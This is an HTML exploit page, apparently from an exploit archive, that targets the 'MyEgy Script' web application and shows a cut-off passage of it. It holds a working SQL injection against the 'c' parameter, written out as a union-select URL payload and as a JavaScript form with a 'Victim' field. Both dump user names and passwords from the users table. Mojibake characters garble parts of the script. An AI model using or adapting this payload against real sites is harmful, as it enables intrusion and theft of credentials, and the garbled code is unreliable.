|
<html> <!-- Script Name :MyEgy Script Authur : Karar alShaMi & Sheko (El3akrab Elmodamer) Email :牋 K4rar@yahoo.com??ahmed_sheko998@yahoo.com Demo : http://www.7obonlin.com Exploit : Write the site in (Victim) field then submit the form :) AdminCp : /?do=login Note : each color of myegy script have a different columns number so try to change the (Columns number) field to 6 or 7 or 9 if the exploit failed with 8 :) Note 2 : We Can Use Get Method To Exploit This Vulnerability See line 64 $cat = $_REQUEST['c']; So we Can Exploit it in this way http://localhost/myegy/?c=[Sql] [Sql] = -1+union+select+1,2,3,4,concat(name,0x3a,password),6,7,8+from+users-- //--> <head><title>MyEgy Explo!t</title> <style type="text/css"> ..style1 { 爐ext-align: center; } </style> </head> <body> <script language="Javascript"> function doit(si,co){ 爁or(var n =1;n<co;n++){ 爄f(tmp){ 爒ar tmp = tmp+n+","; ?}else{ 爒ar爐mp = n+","; 爙 ?} tmp =tmp.replace(5,"concat(name,0x3a,password)"); document.f0.action=si+'/'; document.f0.c.value='-1/**/union/**/select/**/'+tmp+co+'/**/from/**/users--'; document.f0.submit; } </script> <form name="f0" method="post"> <p class="style1">My Egy Explo!t</p> <p class="style1">By : Karar alShaMi & Sheko</p> <p class="style1">Victim: <input name="site" type="text" style="width: 253px" value="
|